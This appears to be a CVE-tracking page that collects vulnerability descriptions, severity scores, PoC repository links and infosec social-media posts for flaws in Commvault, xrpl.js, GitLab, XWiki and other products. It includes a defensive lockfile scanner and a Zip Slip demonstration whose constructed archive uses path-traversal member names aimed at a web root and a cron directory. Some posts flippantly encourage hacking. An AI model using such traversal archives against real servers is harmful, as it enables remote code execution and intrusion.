GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-32730
(5.5 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T09:30:40

1 posts

Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool affects the network system for i-PRO Co., Ltd. surveillance cameras and recorders. This vulnerability allows a local authenticated attacker to use the authentication information from the last connected surveillance cameras and recorders.

cR0w@infosec.exchange at 2025-04-24T12:26:05.000Z ##

Hardcoded keys in PHYSEC devices strikes again.

jvn.jp/en/jp/JVN84627857/

i-pro.com/products_and_solutio

sev:MED 6.8 - CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool affects the network system for i-PRO Co., Ltd. surveillance cameras and recorders. This vulnerability allows a local authenticated attacker to use the authentication information from the last connected surveillance cameras and recorders.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1731
(7.8 HIGH)

EPSS: 0.01%

updated 2025-04-24T06:30:31

4 posts

An incorrect permission assignment vulnerability in the PostgreSQL commands of the USG FLEX H series uOS firmware versions from V1.20 through V1.31 could allow an authenticated local attacker with low privileges to gain access to the Linux shell and escalate their privileges by crafting malicious scripts or modifying system configurations with administrator-level access through a stolen token. Mod

_r_netsec@infosec.exchange at 2025-04-24T00:43:06.000Z ##

Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) 0xdeadc0de.xyz/blog/cve-2025-1

##

cR0w@infosec.exchange at 2025-04-23T13:00:04.000Z ##

@Dio9sys @da_667 Adding this link to the Zyxel vuln above: security.humanativaspa.it/loca

##

_r_netsec@infosec.exchange at 2025-04-23T05:43:06.000Z ##

Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) security.humanativaspa.it/loca

##

oversecurity@mastodon.social at 2025-04-23T05:40:07.000Z ##

Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)

“So we wait, this is our […]

🔗️ [Humanativaspa] link.is.it/ubmq0d

##

CVE-2025-1976(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-04-24T03:31:38

1 posts

Brocade Fabric OS versions starting with 9.1.0 have root access removed, however, a local user with admin privilege can potentially execute arbitrary code with full root privileges on Fabric OS versions 9.1.0 through 9.1.1d6.

cR0w@infosec.exchange at 2025-04-24T12:35:26.000Z ##

This is one of those CVEs that I think the score is higher than the actual risk to most orgs but IDK, we all have different use cases and configurations.

support.broadcom.com/web/ecx/s

sev:HIGH 8.8 - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Brocade Fabric OS versions starting with 9.1.0 have root access removed, however, a local user with admin privilege can potentially execute arbitrary code with full root privileges on Fabric OS versions 9.1.0 through 9.1.1d6.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46419
(5.9 MEDIUM)

EPSS: 0.06%

updated 2025-04-24T03:31:38

1 posts

Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet.

CVE-2025-32818
(7.5 HIGH)

EPSS: 0.04%

updated 2025-04-23T21:30:42

1 posts

A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition.

cR0w@infosec.exchange at 2025-04-23T19:48:57.000Z ##

SonicWALL SSLVPN DoS.

psirt.global.sonicwall.com/vul

sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32969(CVSS UNKNOWN)

EPSS: 0.24%

updated 2025-04-23T19:15:38

1 posts

### Impact It is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled. Depe

cR0w@infosec.exchange at 2025-04-23T16:44:33.000Z ##

SQLi in XWiki.

github.com/xwiki/xwiki-platfor

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

XWiki is a generic wiki platform. In versions starting from 1.8 and prior to 15.10.16, 16.4.6, and 16.10.1, it is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This issue has been patched in versions 16.10.1, 16.4.6 and 15.10.16. There is no known workaround, other than upgrading XWiki.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-2773
(7.2 HIGH)

EPSS: 0.33%

updated 2025-04-23T18:31:07

1 posts

BEC Technologies Multiple Routers sys ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of BEC Technologies Multiple Routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the management

CVE-2025-2772
(5.3 MEDIUM)

EPSS: 0.03%

updated 2025-04-23T18:31:07

1 posts

BEC Technologies Multiple Routers Insufficiently Protected Credentials Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of BEC Technologies routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within /cgi-bin/tools_usermanage.asp. The issue results from

CVE-2025-2770
(4.9 MEDIUM)

EPSS: 0.10%

updated 2025-04-23T18:31:06

1 posts

BEC Technologies Multiple Routers Cleartext Password Storage Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of BEC Technologies routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from storing credentials in a

CVE-2025-2771
(5.3 MEDIUM)

EPSS: 0.10%

updated 2025-04-23T18:31:06

1 posts

BEC Technologies Multiple Routers Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of BEC Technologies routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of authentication prior to allowing access to fun

CVE-2025-2767
(8.8 HIGH)

EPSS: 0.21%

updated 2025-04-23T18:31:00

1 posts

Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The specific flaw exists within the processing of the User-Agent HTTP header. The issue results from the lack of proper valid

cR0w@infosec.exchange at 2025-04-23T17:55:28.000Z ##

Arista NG Firewall XSS -> RCE.

cc: @Dio9sys @da_667

zerodayinitiative.com/advisori

sev:HIGH 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The specific flaw exists within the processing of the User-Agent HTTP header. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24407.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-27087
(5.5 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T15:32:02

1 posts

A vulnerability in the kernel of the Cray Operating System (COS) could allow an attacker to perform a local Denial of Service (DoS) attack.

cR0w@infosec.exchange at 2025-04-22T21:54:06.000Z ##

This is unlikely to impact anyone, but it's a CVE for Cray OS. In 2025. I like it.

support.hpe.com/hpesc/public/d

sev:MED 5.1 - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

A vulnerability in the kernel of the Cray Operating System (COS) could allow an attacker to perform a local Denial of Service (DoS) attack.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-33452
(7.7 HIGH)

EPSS: 0.11%

updated 2025-04-23T14:08:13.383000

1 posts

An issue in OpenResty lua-nginx-module v.0.10.26 and before allows a remote attacker to conduct HTTP request smuggling via a crafted HEAD request.

cR0w@infosec.exchange at 2025-04-22T16:53:08.000Z ##

HTTP request smuggling in OpenResty lua-nginx-module. But even if you don't care about that, check out the blog post ( with PoC ). It has a cat that chases the cursor around the screen and I love it so much.

benasin.space/2025/03/18/OpenR

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1951
(8.4 HIGH)

EPSS: 0.01%

updated 2025-04-23T14:08:13.383000

1 posts

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

cR0w@infosec.exchange at 2025-04-22T15:56:48.000Z ##

Heads-up if you or your target run IBM Hardware Management Console.

ibm.com/support/pages/node/723

sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

nvd.nist.gov/vuln/detail/CVE-2

ibm.com/support/pages/node/723

sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-29660
(9.8 CRITICAL)

EPSS: 0.07%

updated 2025-04-23T14:08:13.383000

1 posts

A vulnerability exists in the daemon process of the Yi IOT XY-3820 v6.0.24.10, which exposes a TCP service on port 6789. This service lacks proper input validation, allowing attackers to execute arbitrary scripts present on the device by sending specially crafted TCP requests using directory traversal techniques.

CVE-2025-29659
(9.8 CRITICAL)

EPSS: 0.21%

updated 2025-04-23T14:08:13.383000

1 posts

Yi IOT XY-3820 6.0.24.10 is vulnerable to Remote Command Execution via the "cmd_listen" function located in the "cmd" binary.

CVE-2025-2703
(6.8 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T12:31:31

2 posts

The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript.

SonarResearch@infosec.exchange at 2025-04-24T15:02:41.000Z ##

📊⚠️ Data in danger!

We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:

sonarsource.com/blog/data-in-d

#appsec #security #vulnerability

##

cR0w@infosec.exchange at 2025-04-23T13:29:19.000Z ##

Some of y'all use Grafana, right?

grafana.com/security/security-

sev:MED 6.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability.

A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-2595
(5.3 MEDIUM)

EPSS: 0.02%

updated 2025-04-23T09:33:37

1 posts

An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.

cR0w@infosec.exchange at 2025-04-23T12:42:54.000Z ##

Ooh, more CODESYS.

certvde.com/en/advisories/VDE-

sev:MED 5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-0926
(5.9 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T06:31:26

1 posts

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video. Axis has released a patched version for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.

cR0w@infosec.exchange at 2025-04-23T12:46:36.000Z ##

A couple CVEs in Axis Camera Station Pro.

axis.com/dam/public/e4/2e/b2/c

sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

axis.com/dam/public/9d/fe/3f/c

sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-1056
(6.1 MEDIUM)

EPSS: 0.01%

updated 2025-04-23T06:31:26

1 posts

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location. Axis has released a patched version for the highlighted flaw. Please refer to the Axis security advisory for more information and solution

cR0w@infosec.exchange at 2025-04-23T12:46:36.000Z ##

A couple CVEs in Axis Camera Station Pro.

axis.com/dam/public/e4/2e/b2/c

sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

axis.com/dam/public/9d/fe/3f/c

sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46221(CVSS UNKNOWN)

EPSS: 0.00%

updated 2025-04-23T03:30:35

1 posts

Rejected reason: Not used

adulau@infosec.exchange at 2025-04-23T07:33:06.000Z ##

While digging into some #Fortinet vulnerabilities, I discovered a set of CVEs that were rejected for being unused.

I'm wondering how this is actually helping vulnerability management. Does this mean those will be never used? or something else?

#vulnerability #cve #vulnerabilities

🔗 vulnerability.circl.lu/vuln/cv

##

CVE-2025-1021
(7.5 HIGH)

EPSS: 0.04%

updated 2025-04-23T03:30:30

1 posts

Missing authorization vulnerability in synocopy in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows remote attackers to read arbitrary files via unspecified vectors.

cR0w@infosec.exchange at 2025-04-23T03:06:10.000Z ##

Synology again.

synology.com/en-global/securit

sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Missing authorization vulnerability in synocopy in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows remote attackers to read arbitrary files via unspecified vectors.

I assume "unspecified vectors" is code for "basic shit we're too embarrassed to disclose."

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32965(CVSS UNKNOWN)

EPSS: 0.04%

updated 2025-04-22T23:53:56

1 posts

### Impact Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. If you are using one of these versions, stop immediately and rotate any private keys or secrets used with affected systems. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions

1 repos

https://github.com/yusufdalbudak/CVE-2025-32965-xrpl-js-poc
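
The advisory text above names the compromised xrpl.js releases (4.2.1 through 4.2.4, and 2.14.2) and the first clean releases on each line (4.2.5 and 2.14.3). The check a practitioner wants is a scan of the repository lockfile for exactly those versions, including transitive copies nested under other packages, which a top-level `package.json` pin does not reveal. The block below is an added example written for this page, not code from the xrpl.js project or from the linked PoC repository; the `package-lock.json` it scans is constructed inline, and the version sets come from the advisory wording above.

```python
"""
Scan an npm lockfile for the compromised xrpl.js releases named in the
advisory. Added example, not xrpl.js project code; the lockfile below is
constructed for the demo.
"""
import json
from typing import List, Tuple

# Versions the advisory lists as carrying the key-exfiltration code.
COMPROMISED_XRPL = {"4.2.1", "4.2.2", "4.2.3", "4.2.4", "2.14.2"}
# First clean release named in the advisory, keyed by major version.
FIXED_XRPL = {"4": "4.2.5", "2": "2.14.3"}

# Constructed package-lock.json (lockfileVersion 3 layout): a direct dependency
# on xrpl plus a transitive copy nested under another package.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"xrpl": "^4.2.0"}},
        "node_modules/xrpl": {"version": "4.2.3"},
        "node_modules/some-wallet-lib": {"version": "1.0.0"},
        "node_modules/some-wallet-lib/node_modules/xrpl": {"version": "2.14.3"},
        "node_modules/ripple-binary-codec": {"version": "2.1.0"},
    },
})


def xrpl_installs(lock_text: str) -> List[Tuple[str, str]]:
    """Return (install path, version) for every copy of xrpl in the lockfile.

    Handles lockfileVersion 2/3 (a "packages" map keyed by install path) and
    the older v1 layout (a nested "dependencies" tree); both are still common.
    """
    lock = json.loads(lock_text)
    found: List[Tuple[str, str]] = []

    packages = lock.get("packages")
    if isinstance(packages, dict):
        for path, meta in packages.items():
            # The package name is whatever follows the last "node_modules/".
            if path.split("node_modules/")[-1] == "xrpl":
                found.append((path, str(meta.get("version", ""))))
        return found

    def walk(deps: dict, prefix: str) -> None:
        for name, meta in deps.items():
            path = f"{prefix}node_modules/{name}"
            if name == "xrpl":
                found.append((path, str(meta.get("version", ""))))
            walk(meta.get("dependencies", {}), path + "/")

    walk(lock.get("dependencies", {}), "")
    return found


def compromised_installs(lock_text: str) -> List[Tuple[str, str, str]]:
    """Return (path, compromised version, release to move to) for each hit."""
    hits: List[Tuple[str, str, str]] = []
    for path, version in xrpl_installs(lock_text):
        if version in COMPROMISED_XRPL:
            hits.append((path, version, FIXED_XRPL[version.split(".")[0]]))
    return hits


if __name__ == "__main__":
    for path, bad, fixed in compromised_installs(SAMPLE_LOCK):
        print(f"{path}: xrpl {bad} is compromised; move to {fixed} and rotate keys")
```

A hit means the version was installed, not merely that it was installable, so the response the advisory describes (rotate or disable any key that touched the affected system) applies regardless of whether the lockfile has since been bumped.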

cR0w@infosec.exchange at 2025-04-22T20:52:55.000Z ##

Go hack cryptocurrency shit.

github.com/XRPLF/xrpl.js/secur

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

xrpl.js is a JavaScript/TypeScript API for interacting with the XRP Ledger in Node.js and the browser. Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions. Anyone who used one of these versions should stop immediately and rotate any private keys or secrets used with affected systems. Users of xrpl.js should upgrade to version 4.2.5 or 2.14.3 to receive a patch. To secure funds, think carefully about whether any keys may have been compromised by this supply chain attack, and mitigate by sending funds to secure wallets, and/or rotating keys. If any account's master key is potentially compromised, disable the key.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-34028
(10.0 CRITICAL)

EPSS: 0.31%

updated 2025-04-22T18:32:18

13 posts

A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.

2 repos

https://github.com/tinkerlev/commvault-cve2025-34028-check

https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028
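
The Commvault description above is the Zip Slip class: an uploaded archive whose member names carry traversal components, expanded by the server without deciding where each member is allowed to land, so that a member ends up in a location the application will later execute. The block below is an added example for this page, not Commvault's code and not the watchTowr PoC. It builds such an archive in memory (the member names are constructed for the demo), computes where a naive join of destination and member name would write each member without writing anything, and then extracts with a containment check that rejects the traversal and absolute-path members while keeping the benign one.

```python
"""
Zip Slip check for uploaded archives: the member name is attacker-controlled,
so the extractor, not the archive, must decide where each member lands.
Added example for this page, not Commvault's code; the archive and the
temporary destination are constructed for the demo.
"""
import io
import os
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple


def build_hostile_zip() -> bytes:
    """Construct an archive with one benign member and two escaping members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("static/index.html", "<h1>ok</h1>")
        # Relative traversal: climbs out of the extraction root.
        zf.writestr("../../webapps/ROOT/shell.jsp", "<% /* constructed placeholder */ %>")
        # Absolute name: pathlib's "/" operator discards the root when joined.
        zf.writestr("/etc/cron.d/absolute", "* * * * * root true")
    return buf.getvalue()


def planned_targets(data: bytes, dest: Path) -> List[Tuple[str, Path]]:
    """Where a naive extractor (dest / member name) would write each member.

    This is the vulnerable pattern: the name is joined to the destination with
    no validation, so ".." components and absolute names leave the root.
    Nothing is written here; the function only computes the paths.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(info.filename, (dest / info.filename).resolve()) for info in zf.infolist()]


def safe_member_path(dest: Path, name: str) -> Optional[Path]:
    """Return the validated target for a member, or None if it escapes dest."""
    root = dest.resolve()
    # Reject absolute names (POSIX, Windows drive, UNC) before joining.
    if os.path.isabs(name) or name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        return None
    # Archive names use "/", but treat backslashes as separators too.
    if any(part == ".." for part in name.replace("\\", "/").split("/")):
        return None
    target = (root / name).resolve()
    # Containment check on the resolved path; this also catches a symlink
    # planted by an earlier member that points outside the root.
    if root not in target.parents:
        return None
    return target


def extract_safely(data: bytes, dest: Path) -> Tuple[List[Path], List[str]]:
    """Extract members that resolve inside dest; return (written, rejected names)."""
    written: List[Path] = []
    rejected: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            target = safe_member_path(dest, info.filename)
            if target is None:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written, rejected


def demo() -> Dict[str, List[str]]:
    """Run the naive plan and the checked extraction against the hostile archive."""
    data = build_hostile_zip()
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp)
        root = dest.resolve()
        escaped = [name for name, path in planned_targets(data, dest) if root not in path.parents]
        written, rejected = extract_safely(data, dest)
        return {
            "escaped": escaped,  # members a naive join would write outside the root
            "written": [p.relative_to(root).as_posix() for p in written],
            "rejected": rejected,
        }


if __name__ == "__main__":
    for key, names in demo().items():
        print(f"{key}: {names}")
```

CPython's own `ZipFile.extractall` strips leading slashes and `..` components, which is why the naive path is computed here rather than extracted; application code that builds its own target paths, or uses another archive library, gets no such protection, and the resolved-path containment check is the portable defence.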

AAKL at 2025-04-25T15:48:47.137Z ##

Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center arcticwolf.com/resources/blog/

##

AAKL@infosec.exchange at 2025-04-25T15:48:47.000Z ##

Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center arcticwolf.com/resources/blog/ #cybersecurity #infosec

##

jos1264@social.skynetcloud.site at 2025-04-25T11:50:03.000Z ##

Critical Commvault Flaw Rated 10/10: CSA Urges Immediate Patching thecyberexpress.com/commvault- #CommonVulnerabilityScoringSystem #CommvaultVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202534028 #CyberNews #CSA

##

soc_prime@infosec.exchange at 2025-04-25T11:12:41.000Z ##

CVE-2025-34028, a maximum-severity #RCE #vulnerability in the Command Center, poses a severe risk to impacted instances and may result in a full system compromise. Detect exploitation attempts with #Sigma rules from SOC Prime Platform.
socprime.com/blog/detect-cve-2

##

beyondmachines1@infosec.exchange at 2025-04-25T08:01:35.000Z ##

Critical vulnerability reported in Commvault Command Center

A critical unauthenticated remote code execution vulnerability (CVE-2025-34028) in Commvault's Command Center allows attackers to force vulnerable systems to download, unzip, and execute malicious code, leading to complete system compromise. The flaw affects Commvault Command Center Innovation Release versions 11.38.0-11.38.19 on both Windows and Linux.

**If you are using Commvault Command Center Innovation Release versions 11.38.0 to 11.38.19, patch IMMEDIATELY. Naturally, make sure the system is isolated from the internet and accessible only from trusted networks. But even with isolation, someone will find your Commvault eventually - through phishing or malware. So don't delay - patch.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

jos1264@social.skynetcloud.site at 2025-04-24T22:25:01.000Z ##

Commvault Command Center Path Traversal Vulnerability (CVE-2025-34028) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2025-04-24T20:30:02.000Z ##

CVE-2025-34028 Detection: A Maximum-Severity Vulnerability in the Commvault Command Center Enables RCE – Source: socprime.com ciso2ciso.com/cve-2025-34028-d #rssfeedpostgeneratorecho #CyberSecurityNews #CVE-2025-34028 #Latestthreats #Vulnerability #socprimecom #socprime #Blog #CVE #rce

##

AAKL@infosec.exchange at 2025-04-24T14:25:59.000Z ##

New.

WatchTower: Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) labs.watchtowr.com/fire-in-the

More:

Infosecurity-Magazine: Highest-Risk Security Flaw Found in Commvault Backup Solutions infosecurity-magazine.com/news #cybersecurity #Infosec

##

jos1264@social.skynetcloud.site at 2025-04-24T13:00:03.000Z ##

Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) helpnetsecurity.com/2025/04/24 #dataprotection #vulnerability #Don'tmiss #Commvault #WatchTowr #Hotstuff #backup #News #PoC

##

cR0w@infosec.exchange at 2025-04-24T12:40:01.000Z ##

Yet another good write-up by watchTowr Labs. This time it was with Commvault. So patch it if you have it, hack it if you don't. And vendors: Take note of the communication and turnaround time in here.

labs.watchtowr.com/fire-in-the

Edit to fix a dumb typo.

##

0x40k@infosec.exchange at 2025-04-24T12:32:05.000Z ##

Whoa, that Commvault SSRF to RCE vulnerability is *ugly*! 😬 We're talking CVE-2025-34028, slapped with a 9.0 CVSS score. Yeah, that's definitely setting off all the alarm bells!

Here's the lowdown: An SSRF vulnerability in "deployWebpackage.do" isn't being filtered properly. What does that mean? Attackers can just upload a ZIP file containing a JSP payload, and *boom* – they get remote code execution. It's a stark reminder that backup systems, unfortunately, are often prime targets precisely because they get overlooked.

So, listen up: If you're running Commvault Command Center versions anywhere from 11.38.0 up to 11.38.19, you need to patch immediately. Get yourself onto version 11.38.20 or 11.38.25 right away! And while you're at it, take a good look at your configuration settings. Good news is, watchTowr Labs has put out a detection tool – definitely make use of that!

Just a friendly reminder on best practices, too: Your backup systems absolutely belong in their own, separate network segment. Crucially, regular penetration tests are a must; don't just rely on automated scans, they simply won't cut it for stuff like this. That's just how it is. 🤷

How about you? Got Commvault deployed? Have you already checked your setup against this vulnerability? What kind of hardening measures do you have in place for your backup infrastructure? Drop your thoughts below! 👇

#Cybersecurity #Pentesting #Commvault

##

_r_netsec@infosec.exchange at 2025-04-24T10:13:06.000Z ##

Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) - watchTowr Labs labs.watchtowr.com/fire-in-the

##

cR0w@infosec.exchange at 2025-04-22T16:59:23.000Z ##

It feels like it's been a while since we've had a perfect 10 ../ and I'm glad we have another one to celebrate. 🥳

documentation.commvault.com/se

sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H

A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution.

nvd.nist.gov/vuln/detail/CVE-2

Edit for dumb typo.

##

CVE-2025-27086
(8.1 HIGH)

EPSS: 0.06%

updated 2025-04-22T15:31:59

2 posts

Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPCM). This issue affects HPE Performance Cluster Manager (HPCM): through 1.12.

beyondmachines1@infosec.exchange at 2025-04-23T10:01:06.000Z ##

Authentication bypass vulnerability reported in HPE Performance Cluster Manager (HPCM)

